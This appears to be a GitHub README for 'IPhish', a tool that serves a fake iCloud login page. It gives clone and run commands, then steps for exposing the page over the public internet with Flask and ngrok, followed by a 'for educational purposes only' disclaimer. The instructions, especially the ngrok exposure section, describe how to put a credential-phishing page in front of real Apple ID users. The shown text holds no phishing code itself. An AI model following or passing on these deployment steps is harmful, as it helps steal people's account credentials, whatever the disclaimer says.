- Hosts a custom iCloud login page
- Allows security researchers to study phishing techniques
- Provides insights into security vulnerabilities
To install IPhish, clone the repository and navigate to the project directory:
git clone https://github.com/jareddarkweb/IPhish.git
cd IPhishUsage
python -m http.server 8000
Then, navigate to http://localhost:8000 in your browser.
Exposing the Server Over WAN Using Flask and ngrok Setting Up Flask Ensure you have Python installed. Install Flask using pip if you haven't already
python server.py
The server will start on http://localhost:5000.
Using ngrok to Expose the Server Download and install ngrok from ngrok.com.
Start ngrok and point it to your local Flask server:
ngrok http 5000
ngrok will provide a forwarding URL (e.g., http://abcd1234.ngrok.io). Use this URL to access your Flask server over the WAN.
Disclaimer IPhish is intended for educational and ethical research purposes only. Unauthorized use of this tool for malicious purposes is strictly prohibited. The developers are not responsible for any misuse of this tool.
Contributing Contributions are welcome! Please fork the repository and submit a pull request with your changes.
License This project is licensed under the MIT License. See the LICENSE file for details.
Contact For any questions or inquiries, please contact jared-calgary-cyber-security@wearehackerone.com.
.png?raw=true)